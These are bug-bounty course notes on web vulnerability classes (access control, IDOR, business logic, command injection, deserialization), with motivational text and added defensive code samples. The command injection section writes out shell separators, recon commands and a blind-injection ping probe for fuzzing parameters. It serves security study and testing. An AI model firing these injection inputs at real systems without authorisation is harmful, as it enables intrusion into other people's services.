There’s a lot to unpack in that previous sentence so let’s start at the beginning. For me it does not matter how often I fall. I realized quickly that falling is a part of life but getting up is an even bigger one. We have to face our mistakes and we have a moral obligation to do what’s right. This means that we will feel bad at times and we will even feel disgusted by ourselves because we haven’t hacked in over a week or we haven’t found any bugs in months. That’s okay, life is a rollercoaster and I believe we should sit back and enjoy the ride. This also means that when our motivation is peaking and we feel on top of the world, I take full advantage of those good times by preparing for times I feel a bit down.

Feeling bad is okay, please allow yourself some breathing room. You are performing at the world top. Hacking requires knowledge from so many different fields, it’s a wonder that there are even people like you out there, and even if you are not a hacker, the fact that you are looking for self-improvement is amazing in and of itself, and don’t let anyone tell you otherwise.

I want to devote a part of this piece to your worst enemy in life as well. This may seem a bit cliche but I am a firm believer of the fact that we are our own worst enemies in every sense of the word. We can hold ourselves back with merely a thought. If we feel like we are on top of the world, there is almost nothing that can stop us, but one piece of bad news can ruin our streak for a long time. Don’t fight this, go with the flow amazing hacker. It’s like fighting the flow of time. There is nothing in the laws of physics that stops time from flowing backwards, yet we can never make it do so. Funny don’t you think?

I want to leave you all a final message. In life, we all walk our own road, but that doesn’t mean we have to get up alone. You have friends in your life and if you do not, I will offer you a place you can call home. This place is full of hackers but I promise you we are good and you have nothing to fear from us. Define your own normal. Uncle Rat Out.
--------------------------------------------------------------------------------
(image assets of /notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/: Screenshot_from_2021-03-11_15-19-23.jpeg, Screenshot_from_2021-03-11_15-23-14.jpeg, Screenshot_from_2021-03-11_15-29-50.jpeg, Untitled.png, Untitled 1.png to Untitled 19.png, burpproject.png, dashboard.jpeg, deploy.jpeg, enter_to_procee.jpeg, h1.png, heroku_terms.jpeg; not reproduced here)
--------------------------------------------------------------------------------
(image assets of /notes/Rat's methodology e728e0cffd8d429e8f9a1317b05feadf/: Untitled.png, Untitled 1.png to Untitled 6.png; not reproduced here)
--------------------------------------------------------------------------------
/notes/Vulnerability types d6487b7204244f159482be2dfb025fea.md:
--------------------------------------------------------------------------------
# Vulnerability types

[CSRF](Vulnerability%20types%20d6487b7204244f159482be2dfb025fea/CSRF%209bfcc03c9ce246a58d4815982e85bc18.md)

[IDOR](Vulnerability%20types%20d6487b7204244f159482be2dfb025fea/IDOR%20bb563c4b361c417cb6e3ec4268889a83.md)

[XSS](Vulnerability%20types%20d6487b7204244f159482be2dfb025fea/XSS%200ad0878f33094ea6b8ac90e94c2b0dc2.md)

[Template injections](Vulnerability%20types%20d6487b7204244f159482be2dfb025fea/Template%20injections%205633da87439b4f3b91e56feeb5a3332f.md)

[BAC](Vulnerability%20types%20d6487b7204244f159482be2dfb025fea/BAC%20f2481eba6f7c4873b99b33739bb87033.md)
[XXE](Vulnerability%20types%20d6487b7204244f159482be2dfb025fea/XXE%20dbfdda26a21f48c7b1056cb7693481bb.md)

[SSRF](Vulnerability%20types%20d6487b7204244f159482be2dfb025fea/SSRF%20810a9009d00349518ca3c663f36100ea.md)

[Command injection](Vulnerability%20types%20d6487b7204244f159482be2dfb025fea/Command%20injection%20f3446f65fdc9437b9c16ef96b33edc36.md)

[Business logic flaws](Vulnerability%20types%20d6487b7204244f159482be2dfb025fea/Business%20logic%20flaws%20fa68e1871a024a6a95399dd4cc2718a0.md)

[Insecure deserialization](Vulnerability%20types%20d6487b7204244f159482be2dfb025fea/Insecure%20deserialization%20cb6306370b9b4cb1acf8ddf5ab35fdad.md)

[The Origin Of Business logic vulnerabilities](Vulnerability%20types%20d6487b7204244f159482be2dfb025fea/The%20Origin%20Of%20Business%20logic%20vulnerabilities%209f522fca6a7044b4a9ae9c1522696b5c.md)

--------------------------------------------------------------------------------
/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/BAC f2481eba6f7c4873b99b33739bb87033.md:
--------------------------------------------------------------------------------
# BAC

# What is it

BAC: Broken Access Control

Broken Access Control is exactly what the name states: the application does not enforce who may execute what. It can manifest itself as both horizontal and vertical privilege escalation.

When we speak about privilege escalation, we are talking about the ability to execute functionality we are not supposed to be able to execute. But what exactly do we mean by vertical and horizontal?

If the functionality is something we can execute, but not with the parameters we feed into it, we are talking about horizontal privilege escalation. A good example of this would be IDORs. If, on the other hand, we can not execute that functionality at all, not even with our own data, we are talking about vertical privilege escalation.

We can also give a few examples of this behaviour, but first we need to define some properties. To speak of BAC, we need to have the following conditions met:

- We need to be able to create different users OR be assigned different users
- The users need to be of different privilege levels if we want to test for vertical privilege escalation, for example an admin and a normal user
- There need to be functions that our low privilege user is not authorised to execute, either with the given data or at all

Some examples:

- We have an admin and a normal user. We can test the admin settings with the low priv user
- We have a normal user and a prospect user. The prospect user can not execute all the functions because he only has a trial account
- We have two users of the same authorisation level: see IDOR

# Attack strategy

Again we can test this manually or semi-automatically. I do not believe robots have the ability to execute complex stateful scenarios where sequential steps often rely on previous input.

## Manually

To test for BAC manually, we have several options at our disposal. One of the most powerful tools we have is JavaScript and the developer console of the browser.

JavaScript files will contain functions that can be executed. One common tactic developers use to "protect" their programs is to simply disable the UI elements. This means that the JavaScript functions might still be executable. If that is the case, say for example we can not click on the UI element to open the invoices BUT we can execute the JavaScript function which prints the invoice details, we have a BAC on our hands.

You may have noticed this requires some knowledge of how your target works, because you need to know which levels of authorisation exist and what those types of accounts can and can’t do. You will also need to be able to recognise what the different JavaScript functions might do.

We talked a bit about the developer console of the browser as well, because there is a tab called “console” which will let you execute any JavaScript and it has autocompletion (IntelliSense). This means you can type any letter and the console will suggest the identifiers from the loaded JavaScript that match what you typed. On top of the previously discussed advantages, we can also execute our JavaScript functions and directly observe the result.

We can also take a more direct approach and simply log in as a high privilege user, navigate to functionality a low priv user can not execute, copy the URL, log in as the low priv user and paste the URL in the browser. A caveat, however, is that we again need to be familiar with the levels of authorisation the program supports and what those types of users can and can not access.

A last strategy we can take borders on automation, and it is the first step we need to prepare for the next chapter.

We can send all of the requests that low priv users should not be able to execute to the repeater of our MiTM proxy, such as Burp, and replace the authorisation material (such as the JWT or the session cookies, see IDOR) with that of the low priv user. The point is not to grab the low priv user's authorisation headers, by the way; it is to test for broken access control issues.

## Semi-automated strategy

We can use the same strategy here as we did for IDORs. Either the Burp extension Authorize or Match and Replace can help us here. Please refer to Tools > Burp: Authorize and Burp: Match and replace. We can also use Burp Suite AutoRepeater, but that plugin seems to have been broken in the last release.
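The BAC note above describes the "disabled button" anti-pattern and the replay-with-a-low-privilege-session check in words. The following Node.js module is an added example (not code from these notes or from any project they describe) that puts both side by side: a front end that only disables the invoice button, the handler behind it with no check, the hardened handlers that enforce role (vertical) and ownership (horizontal) where the data is served, and a small regression check that runs each operation as the admin and as the normal user and compares the results, which is what Authorize-style tooling automates. The users `alice`/`bob`, the invoices and the function names are constructed sample data.

```javascript
"use strict";
// Added example: "disabled UI element" versus server-side authorization.
// Users, invoices, roles and operation names are constructed sample data.

const USERS = {
  alice: { id: 1, name: "alice", role: "admin" },
  bob: { id: 2, name: "bob", role: "user" },
};
const INVOICES = {
  1001: { id: 1001, owner: 1, total: 19900 }, // amounts in cents
  1002: { id: 1002, owner: 2, total: 2500 },
};

class Forbidden extends Error {}

// --- Vulnerable pattern -------------------------------------------------------
// The front end hides the feature from non-admins by disabling the button...
function renderInvoiceButton(user) {
  return { label: "Open invoices", disabled: user.role !== "admin" };
}
// ...but the function the button calls has no check of its own. Anything that
// can reach it (the console tab, a replayed request) gets every invoice.
function listInvoicesVulnerable(_user) {
  return Object.values(INVOICES);
}

// --- Hardened pattern ---------------------------------------------------------
// Vertical control: the role check lives in the handler that serves the data,
// so hiding or showing the button no longer matters.
function listInvoicesSecure(user) {
  if (user.role !== "admin") throw new Forbidden("admin role required");
  return Object.values(INVOICES);
}
// Horizontal control: an object-level endpoint checks ownership, not only role
// (this is the IDOR case the note refers to).
function getInvoiceSecure(user, invoiceId) {
  const inv = INVOICES[invoiceId];
  if (!inv) return null;
  if (user.role !== "admin" && inv.owner !== user.id) {
    throw new Forbidden("not the owner of invoice " + invoiceId);
  }
  return inv;
}

// --- Access-control regression check ----------------------------------------
// Run every privileged operation once as the high-privilege user and once as
// the low-privilege user. "BYPASSED" means both got the same response, which
// still has to be judged against what the low-priv user may legitimately see.
function accessControlReport(highPriv, lowPriv, operations) {
  const report = {};
  for (const [name, op] of Object.entries(operations)) {
    let expected;
    try {
      expected = JSON.stringify(op(highPriv));
    } catch (e) {
      report[name] = "high-priv user denied: " + e.message;
      continue;
    }
    try {
      const got = JSON.stringify(op(lowPriv));
      report[name] = got === expected ? "BYPASSED" : "different response";
    } catch (e) {
      report[name] = e instanceof Forbidden ? "enforced" : "error: " + e.message;
    }
  }
  return report;
}

// Operations under test; each takes the acting user as its only argument.
const OPERATIONS = {
  listInvoicesVulnerable: (u) => listInvoicesVulnerable(u),
  listInvoicesSecure: (u) => listInvoicesSecure(u),
  readAlicesInvoice: (u) => getInvoiceSecure(u, 1001),
  readOwnInvoice: (u) => getInvoiceSecure(u, 1002),
};

console.log("button as bob:", renderInvoiceButton(USERS.bob));
console.log("report:", accessControlReport(USERS.alice, USERS.bob, OPERATIONS));
```

Running it shows `listInvoicesVulnerable` as `BYPASSED` (bob gets every invoice although his button is disabled) and the secure handlers as `enforced`. `readOwnInvoice` also reports `BYPASSED`, and that is correct behaviour: bob owns invoice 1002. That is the caveat the note makes twice: an identical response only proves a bypass once you know what each level of user is legitimately allowed to access.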
--------------------------------------------------------------------------------
/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/Business logic flaws fa68e1871a024a6a95399dd4cc2718a0.md:
--------------------------------------------------------------------------------
# Business logic flaws

# What is it?

Business logic flaws arise in many different situations. They occur when users pass values to the target that it does not expect, which can cause unforeseen behaviour. This is not always impactful, but sometimes it is devastating. Analysts make assumptions about user behavior, and those assumptions can be wrong; the result is a flaw in the design and in the implementation of the logic.

The reason I love logic flaws so much is that they are really hard to look for. Normal use of the application will not always reveal them, so we have to look for them specifically. This makes it nearly impossible to build automated tools that find logic vulnerabilities on a consistent basis.

A business process usually consists of:

```jsx
Analysis > Development > Testing > Production
```

I know this process is very simplified, but the details are not important right now. Usually several "stories" or "features" get taken up into a release cycle. If the analysis at the start contains logic flaws, that is an entry point for our attack.

What also sometimes happens is that a piece of software is developed and a couple of years later an expansion or adaptation is requested. Documentation is usually a big problem in companies, so when a change has to be made to a certain feature, the developers have to dig into the code, where they might remove important checks that guard the sanity of the user's actions.

# What is the impact?

The impact is highly dependent on the specific target and the logic flaw you found. It is related to the impacted functionality as well.

- Client-side calculation of prices in a clothing webshop - High/Crit
    - This is core business for the target, so any issue related to the core business will automatically be more impactful
- When brute forcing usernames on the login page, you get a 200 OK status when the username exists and a 403 if it does not - Low
    - This is rather low unless those usernames really have to be secret: you would have to brute force the login names and then still guess the correct password. This is more useful on a pentest job.
- Negative amounts of items on a webshop lead to negative prices - High/Crit
    - This is core business for the target, so any issue related to the core business will automatically be more impactful; above all, direct impact on money is very important
- If price, amount and total price are all integers, we can overflow the total price when the server computes price * amount - Critical
    - This might lead to the target returning us money, which is certainly not desirable
- Registering with the same username as an existing user takes over the account - Critical
    - Account takeovers are always higher on the severity scale
- The user manual might tell you that you can't deactivate super admin users, but after trying it you can - Medium
    - You have to be a privileged user to even be allowed into the user management system, so this lowers the severity a bit
- A field that is in the response but not in the original request, yet gets processed by the server when you add it to the request - Nothing/Critical
    - This really depends on the field that is being processed. If you can change your account type from "User" to "Admin", that would of course be a big problem.
- Importing products with the same name as existing ones overwrites them, even if the products do not belong to you and you should not be able to overwrite them - Medium
    - You are already in a privileged position before you can import products; this lowers the severity
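Three of the webshop flaws in the list above (client-side prices, negative amounts, and an integer overflow of price * amount) come out of a single badly written total function. The following is an added Python example, not code from this repository; the catalogue, the limits and the 32-bit total are assumptions chosen to make the flaws visible next to the hardened check.

```python
from typing import Dict, List, Optional, Tuple

# Constructed catalogue for the example: the server's own price list, in cents.
CATALOGUE_CENTS: Dict[str, int] = {"tshirt": 1999, "jacket": 12999}

# Server-side limits (assumed values): maximum quantity per line and maximum order total.
MAX_QTY = 1000
MAX_ORDER_CENTS = 10_000_00

# An order line as the client submits it: (sku, unit price the client claims, quantity).
OrderLine = Tuple[str, int, int]


def wrap_int32(n: int) -> int:
    """Emulate a 32-bit signed integer, like the 'price * amount' total the notes describe overflowing."""
    return ((n + 2**31) % 2**32) - 2**31


def total_insecure(lines: List[OrderLine]) -> int:
    """Vulnerable version: trusts the client's unit price and quantity and keeps the total in an int32.

    Three flaws from the list fall out of this one function: client-side prices are honoured,
    a negative quantity yields a negative total, and a large quantity wraps the total around.
    """
    total = 0
    for _sku, client_price, qty in lines:
        total = wrap_int32(total + wrap_int32(client_price * qty))
    return total


def total_secure(lines: List[OrderLine], catalogue: Dict[str, int] = CATALOGUE_CENTS) -> int:
    """Hardened version: server prices only, quantity range-checked, total bounded before it can wrap."""
    total = 0
    for sku, _client_price, qty in lines:  # the client's price is ignored on purpose
        if sku not in catalogue:
            raise ValueError(f"unknown sku {sku!r}")
        if type(qty) is not int or not 1 <= qty <= MAX_QTY:
            raise ValueError(f"quantity out of range for {sku!r}: {qty!r}")
        total += catalogue[sku] * qty
        if total > MAX_ORDER_CENTS:
            raise ValueError("order total exceeds the allowed maximum")
    return total


def order_rejected(lines: List[OrderLine]) -> Optional[str]:
    """Return the rejection reason for an order, or None if the hardened check accepts it."""
    try:
        total_secure(lines)
    except ValueError as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    cases = [
        ("negative qty", [("tshirt", 1999, -1)]),
        ("overflow", [("tshirt", 1999, 2_000_000)]),
        ("client price", [("jacket", 1, 1)]),
    ]
    for name, order in cases:
        print(f"{name:12} insecure total={total_insecure(order):>12}  secure: {order_rejected(order)}")
```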
--------------------------------------------------------------------------------
/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/Command injection f3446f65fdc9437b9c16ef96b33edc36.md:
--------------------------------------------------------------------------------
# Command injection

# What is it?

Command injection happens when we can control a parameter that gets passed into a shell. If that input is not handled safely and sanitised properly, we can insert a command into our input and have it executed by the shell. Depending on the capabilities and privileges of that shell, we can execute various commands.

The theory sounds very simple; however, it is not simple at all to find this kind of vulnerability.

![Command%20injection%20f3446f65fdc9437b9c16ef96b33edc36/Untitled.png](Command%20injection%20f3446f65fdc9437b9c16ef96b33edc36/Untitled.png)

# Attack strategy

The reason command injection is so hard to find is that we never really know which of our inputs will trigger a back-end shell to execute. This means we will need to fuzz every parameter we find, but you might be wondering which characters to fuzz with. To determine this, we first need to talk about which command separators can possibly be used, and also which commands.

## Separators

The following command separators work on both Windows and Unix-based systems:

- `&`
- `&&`
- `|`
- `||`

The following command separators work only on Unix-based systems:

- `;`
- Newline (`0x0a` or `\n`)

On Unix-based systems, you can also use backticks or the dollar character to perform inline execution of an injected command within the original command:

- `` ` `` injected command `` ` ``
- `$(` injected command `)`

## Commands

Below is a summary of some commands that are useful on Linux and Windows platforms:

[Linux and windows commands](Command%20injection%20f3446f65fdc9437b9c16ef96b33edc36/Linux%20and%20windows%20commands%208ed7d380f0a740dfbdb72395dccf7cc8.csv)

## Fuzzing list

Based on this, we can create a fuzzing list that contains all the separators together with all the possible commands. I will leave this up to you as it should be a good exercise. Feel free to contact me on Discord if you have issues with this, however.

Fuzz every single parameter you can find with this wordlist by using Burp Intruder.

![Command%20injection%20f3446f65fdc9437b9c16ef96b33edc36/Untitled%201.png](Command%20injection%20f3446f65fdc9437b9c16ef96b33edc36/Untitled%201.png)

![Command%20injection%20f3446f65fdc9437b9c16ef96b33edc36/Untitled%202.png](Command%20injection%20f3446f65fdc9437b9c16ef96b33edc36/Untitled%202.png)

As you can see in the screenshot, we load in our fuzzing list and mark the parameters we want to test.

## Blind command injection

We can test for blind command injection by launching a request that executes a ping command to the loopback address.

```jsx
& ping -c 10 127.0.0.1 &
```

Again, add this to your fuzzing list and mind the response time for this attack vector. If it is longer than 10 seconds, we probably have a blind command injection, but be mindful that lag might occur and give a false positive.
--------------------------------------------------------------------------------
/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/Command injection f3446f65fdc9437b9c16ef96b33edc36/Linux and windows commands 8ed7d380f0a740dfbdb72395dccf7cc8.csv:
--------------------------------------------------------------------------------
Purpose of command,Linux,Windows
Name of current user,whoami,whoami
Operating system,uname -a,ver
Network configuration,ifconfig,ipconfig /all
Network connections,netstat -an,netstat -an
Running processes,ps -ef,tasklist
--------------------------------------------------------------------------------
/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/Command injection f3446f65fdc9437b9c16ef96b33edc36/Linux and windows commands 8ed7d380f0a740dfbdb72395dccf7cc8/Name of current user beb0eeaa290a4e0aac30baa74c77087d.md:
--------------------------------------------------------------------------------
# Name of current user

Linux: whoami
Windows: whoami
--------------------------------------------------------------------------------
/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/Command injection f3446f65fdc9437b9c16ef96b33edc36/Linux and windows commands 8ed7d380f0a740dfbdb72395dccf7cc8/Network configuration 0cf0bc2bcef047ffa7cf5f6f3586dd02.md:
--------------------------------------------------------------------------------
# Network configuration

Linux: ifconfig
Windows: ipconfig /all
--------------------------------------------------------------------------------
/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/Command injection f3446f65fdc9437b9c16ef96b33edc36/Linux and windows commands 8ed7d380f0a740dfbdb72395dccf7cc8/Network connections 4676cf7a1c6242d8812e5477a55968f4.md:
--------------------------------------------------------------------------------
# Network connections

Linux: netstat -an
Windows: netstat -an
--------------------------------------------------------------------------------
/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/Command injection f3446f65fdc9437b9c16ef96b33edc36/Linux and windows commands 8ed7d380f0a740dfbdb72395dccf7cc8/Operating system 8f3db179a87b4ec487f0386b866951c7.md:
--------------------------------------------------------------------------------
# Operating system

Linux: uname -a
Windows: ver
--------------------------------------------------------------------------------
/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/Command injection f3446f65fdc9437b9c16ef96b33edc36/Linux and windows commands 8ed7d380f0a740dfbdb72395dccf7cc8/Running processes c8592e3c8fe9486eab2b3122c43f318c.md:
--------------------------------------------------------------------------------
# Running processes

Linux: ps -ef
Windows: tasklist
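The separator list from the command injection notes above is exactly what a server-side check has to reject before a parameter reaches a shell. The following is an added Python example, not code from this repository: it scans a value for those separators, shows the vulnerable string-splicing pattern next to an argv-based version that never involves a shell, and uses an assumed hostname pattern for the allow-list.

```python
import ipaddress
import re
from typing import List

# Separators from the notes. Two-character tokens are tried first so "&&" is not reported as "&", "&".
SEPARATORS_BOTH = ["&&", "||", "&", "|"]   # work on Windows and Unix
SEPARATORS_UNIX = [";", "\n", "$(", "`"]    # Unix only; "$(" and "`" are inline substitution
TOKENS = sorted(SEPARATORS_BOTH + SEPARATORS_UNIX, key=len, reverse=True)


def find_separators(value: str) -> List[str]:
    """Return every shell separator / substitution token present in a parameter value, in order."""
    found, i = [], 0
    while i < len(value):
        for tok in TOKENS:
            if value.startswith(tok, i):
                found.append(tok)
                i += len(tok)
                break
        else:
            i += 1
    return found


def ping_command_unsafe(host: str) -> str:
    """Vulnerable pattern: the parameter is spliced into a command line that a shell will parse.

    In real code this string would go to subprocess.run(cmd, shell=True) or os.system(cmd),
    so the separators in `host` become new commands.
    """
    return f"ping -c 1 {host}"


def ping_command_safe(host: str) -> List[str]:
    """Hardened pattern: allow-list the value, then build an argv list so no shell is involved."""
    bad = find_separators(host)
    if bad:
        raise ValueError(f"shell metacharacters in host: {bad}")
    try:
        ipaddress.ip_address(host)                       # a literal IPv4/IPv6 address is fine
    except ValueError:
        # Assumed hostname pattern: letters, digits, dots and dashes only.
        if not re.fullmatch(r"[A-Za-z0-9][A-Za-z0-9.-]{0,252}", host):
            raise ValueError(f"invalid host {host!r}") from None
    return ["ping", "-c", "1", host]                     # subprocess.run(argv) with shell=False


def host_rejected(host: str) -> bool:
    """True if the hardened builder refuses the value."""
    try:
        ping_command_safe(host)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed inputs: a benign host and the blind-injection probe from the notes.
    for value in ["127.0.0.1", "127.0.0.1 & ping -c 10 127.0.0.1 &"]:
        print(f"{value!r}: separators={find_separators(value)} rejected={host_rejected(value)}")
        print("  unsafe command line:", ping_command_unsafe(value))
```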
--------------------------------------------------------------------------------
/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/IDOR bb563c4b361c417cb6e3ec4268889a83.md:
--------------------------------------------------------------------------------
# IDOR

# What is it

IDOR: Insecure Direct Object Reference

These vulnerabilities arise from access control issues; we will devote an entire chapter to those. The term IDOR was made popular by its appearance in the OWASP Top 10, but in reality it is simply another type of Broken Access Control issue. IDORs can manifest as both horizontal and vertical privilege escalation. To speak of an IDOR, the following conditions have to be met:

- An object identifier exists in the request, either as a GET or a POST parameter
- A Broken Access Control issue exists that allows the user to access data they should not be able to access

These terms may seem abstract, so let's look at an example:

- GET /invoice.php?id=12
- POST /personalInfo.php
    - {personId:23,name:"tester"}
- GET /invoices/1234.txt

In these examples we can see a POST and a GET request being made; both contain an identifier. In a normal situation, the user can only access invoices or personal data that belong to them. If, however, we change this identifier and get data returned that does not belong to our user, we have an IDOR.

This may seem like a simple interpretation of IDORs, but this is basically how it works. The complexity comes from how we can automate looking for this and from the different users involved.

# Attack strategy

We can basically take a manual or a semi-automated strategy for this.

## Manually

Manually searching for IDORs is probably the easiest way. In a previous chapter we went over your main attack strategy, which stated that you should explore the website with your MitM proxy in the background (see general attack strategy). Burp Suite has an option to show parameterised requests:

![IDOR%20bb563c4b361c417cb6e3ec4268889a83/Untitled.png](IDOR%20bb563c4b361c417cb6e3ec4268889a83/Untitled.png)

![IDOR%20bb563c4b361c417cb6e3ec4268889a83/Untitled%201.png](IDOR%20bb563c4b361c417cb6e3ec4268889a83/Untitled%201.png)

We can use this filter to show us any request that contains parameters. We will have to go through these requests manually and send the requests that contain identifiers to the Repeater.

In the Repeater we can replace the authentication methods that are expected by the server with valid authentication tokens:

- A JWT in the Authorization header might need to be replaced
- Session cookies might need to be replaced
- Custom authentication methods may be in place

You will need to identify which authentication mechanism is being used and make sure you replace any expired credentials with valid ones. Grab new valid tokens by logging in and making similar requests.

Now that you have the request working in the Repeater, we can try replacing the identifiers in the request.

**BE CAREFUL: You are a bug bounty hunter, you are testing a live production environment. Do not fill in a random identifier. Instead create a new account. Log into that account and navigate to the same functionality.**

Example:

- We have a request going to GET /invoice.php?id=12
- Send it to the Repeater
- The request contains a JWT token in the Authorization header that is expired
- When you launch the request, it will return a 500 because the JWT is expired
- Log in to the application and check the HTTP history in your proxy tab
- One of the latest requests should contain a JWT token that's valid
- Copy that JWT token
- Replace the expired JWT token in your Repeater
- You should get a 200 OK response from the server now
- Create a new account
- Log into that account and check the HTTP history in your proxy tab
- One of the latest requests should contain a JWT token that's valid
- Copy that JWT token
- Replace the JWT token in your Repeater
- If you are now receiving a 200 OK response from the server AND the content of the invoice, you have an IDOR

## Semi-automated testing

### **Authorize**

Please refer to Tools > Burp Authorize

### Match and replace

Please refer to Tools > Burp: Match and replace
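The two-account procedure above boils down to one question: does the handler tie the identifier to the session that presents it? The following is an added Python example, not code from this repository; the invoice store, the session tokens and the exception types are constructed for the example.

```python
from dataclasses import dataclass
from typing import Callable, Dict


@dataclass(frozen=True)
class Invoice:
    invoice_id: int
    owner_id: int
    body: str


# Constructed data: two users, two invoices (id 12 matches the GET /invoice.php?id=12 example).
INVOICES: Dict[int, Invoice] = {
    12: Invoice(12, 100, "Invoice 12 for user 100"),
    13: Invoice(13, 200, "Invoice 13 for user 200"),
}
SESSIONS: Dict[str, int] = {"token-user-100": 100, "token-user-200": 200}


class Unauthorized(Exception):
    """Unknown or expired token: the 'expired JWT' step in the notes."""


class Forbidden(Exception):
    """Valid session, but the object belongs to someone else."""


def _user_from_session(token: str) -> int:
    if token not in SESSIONS:
        raise Unauthorized("expired or unknown session")
    return SESSIONS[token]


def get_invoice_insecure(token: str, invoice_id: int) -> str:
    """Vulnerable: authenticates the caller, then trusts the identifier as-is (an IDOR)."""
    _user_from_session(token)
    return INVOICES[invoice_id].body


def get_invoice(token: str, invoice_id: int) -> str:
    """Fixed: the authorisation check binds the object to the requesting user.

    A missing and a foreign invoice get the same response, so the endpoint is not an
    enumeration oracle for which ids exist.
    """
    user_id = _user_from_session(token)
    inv = INVOICES.get(invoice_id)
    if inv is None or inv.owner_id != user_id:
        raise Forbidden("not your invoice")
    return inv.body


def idor_check(handler: Callable[[str, int], str], victim_token: str, attacker_token: str, invoice_id: int) -> bool:
    """The notes' test: fetch account A's object with account B's valid token and compare.

    True means B received A's data, i.e. the handler has an IDOR.
    """
    expected = handler(victim_token, invoice_id)      # confirm the request works for the owner first
    try:
        got = handler(attacker_token, invoice_id)
    except Forbidden:
        return False
    return got == expected


if __name__ == "__main__":
    for name, handler in [("insecure", get_invoice_insecure), ("fixed", get_invoice)]:
        print(name, "IDOR:", idor_check(handler, "token-user-100", "token-user-200", 12))
```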
--------------------------------------------------------------------------------
/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/Insecure deserialization cb6306370b9b4cb1acf8ddf5ab35fdad.md:
--------------------------------------------------------------------------------
# Insecure deserialization

# Introduction

Insecure deserialization is often seen as a very hard vulnerability type, but it doesn't have to be. It does require decent knowledge of the programming languages in question, but with some of that knowledge it can also be found very trivially.

In this module we will look at the Java, PHP and Ruby deserialization processes through practical examples on the PortSwigger labs. This will allow us to better understand the concept.

# Serialization

If we want to learn about deserialization, we first need to learn what serialization is. Serialization is the process of turning complex structures such as objects (for example a person with an age, sex and name) into a much flatter format, so that they can be sent and received as a sequential stream of bytes. This allows us to write complex data to memory, files or databases, and also to send that data over the network to different APIs.

When we serialise data, we save its attributes and their values; this is really important to remember. A female person of 16 years of age with the name "Sophie Kent" will get turned into something like {female|16|Sophie|Kent}.

For example, consider a User object with the following attributes in PHP:

```php
$user->name = "carlos";
$user->isLoggedIn = true;
```

When serialized, this object may look something like this:

```php
O:4:"User":2:{s:4:"name":s:6:"carlos"; s:10:"isLoggedIn":b:1;}
```

This can be interpreted as follows:

```php
O:4:"User" - An object with the 4-character class name "User"
2 - the object has 2 attributes
s:4:"name" - The key of the first attribute is the 4-character string "name"
s:6:"carlos" - The value of the first attribute is the 6-character string "carlos"
s:10:"isLoggedIn" - The key of the second attribute is the 10-character string "isLoggedIn"
b:1 - The value of the second attribute is the boolean value true
```

**Python refers to serialization as pickling**

**Ruby refers to serialization as marshalling**

# Deserialization

When we deserialize we do the opposite: we take the byte stream that was created and turn it back into an object. The avid hacker will have already spotted where this can go wrong.

![Insecure%20deserialization%20cb6306370b9b4cb1acf8ddf5ab35fdad/Untitled_Diagram.png](Insecure%20deserialization%20cb6306370b9b4cb1acf8ddf5ab35fdad/Untitled_Diagram.png)

How exactly the serialisation happens depends heavily on the programming language: some turn the objects into binary formats, others use various string formats. Some are easy to read, some are very hard to read.
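The token-by-token reading of the serialized User above is exactly what a parser does, and writing one makes the format's rules concrete: every string carries a byte length, and the length, not the quotes, decides where a value ends. The following is an added Python example, not code from this repository; it decodes the subset of PHP's serialize() format used above (null, bool, int, string, object). PHP itself writes `;` after a property name where the example above writes `:`; the parser accepts both.

```python
from typing import Any, Tuple

WS = b" \t\r\n"


class PhpSerializeError(ValueError):
    """Raised on malformed input. A real unserialize() would instead hand the result to the application."""


def _skip_ws(data: bytes, pos: int) -> int:
    while pos < len(data) and data[pos] in WS:
        pos += 1
    return pos


def _expect(data: bytes, pos: int, ch: bytes) -> int:
    if data[pos:pos + 1] != ch:
        raise PhpSerializeError(f"expected {ch!r} at offset {pos}")
    return pos + 1


def _read_int(data: bytes, pos: int, terminator: bytes) -> Tuple[int, int]:
    end = data.find(terminator, pos)
    if end < 0:
        raise PhpSerializeError(f"unterminated number at offset {pos}")
    try:
        return int(data[pos:end]), end + 1
    except ValueError:
        raise PhpSerializeError(f"bad number at offset {pos}") from None


def _read_str(data: bytes, pos: int) -> Tuple[bytes, int]:
    """Parse <len>:"<bytes>": <len> is a byte count and the quotes are not escaped, so the length rules."""
    length, pos = _read_int(data, pos, b":")
    pos = _expect(data, pos, b'"')
    raw = data[pos:pos + length]
    if len(raw) != length:
        raise PhpSerializeError(f"declared length {length} runs past the end of the data")
    return raw, _expect(data, pos + length, b'"')


def _parse(data: bytes, pos: int) -> Tuple[Any, int]:
    pos = _skip_ws(data, pos)
    tag = data[pos:pos + 1]
    if tag not in (b"N", b"b", b"i", b"s", b"O"):
        raise PhpSerializeError(f"unsupported or missing type tag {tag!r} at offset {pos}")
    if tag == b"N":                                   # null: N;
        return None, _expect(data, pos + 1, b";")
    pos = _expect(data, pos + 1, b":")
    if tag == b"b":                                   # boolean: b:0; or b:1;
        val, pos = _read_int(data, pos, b";")
        if val not in (0, 1):
            raise PhpSerializeError("boolean must be 0 or 1")
        return bool(val), pos
    if tag == b"i":                                   # integer: i:42;
        return _read_int(data, pos, b";")
    if tag == b"s":                                   # string: s:6:"carlos";
        raw, pos = _read_str(data, pos)
        return raw.decode("utf-8"), _expect(data, pos, b";")
    cls, pos = _read_str(data, pos)                   # object: O:4:"User":2:{...}
    pos = _expect(data, pos, b":")
    count, pos = _read_int(data, pos, b":")
    pos = _expect(data, pos, b"{")
    obj = {"__class__": cls.decode("utf-8")}
    for _ in range(count):
        pos = _skip_ws(data, pos)
        pos = _expect(data, pos, b"s")                # property names are strings
        pos = _expect(data, pos, b":")
        key, pos = _read_str(data, pos)
        if data[pos:pos + 1] not in (b";", b":"):     # PHP emits ';' here; the notes' example has ':'
            raise PhpSerializeError(f"expected ';' after property name at offset {pos}")
        obj[key.decode("utf-8")], pos = _parse(data, pos + 1)
    pos = _skip_ws(data, pos)
    return obj, _expect(data, pos, b"}")


def php_unserialize(data) -> Any:
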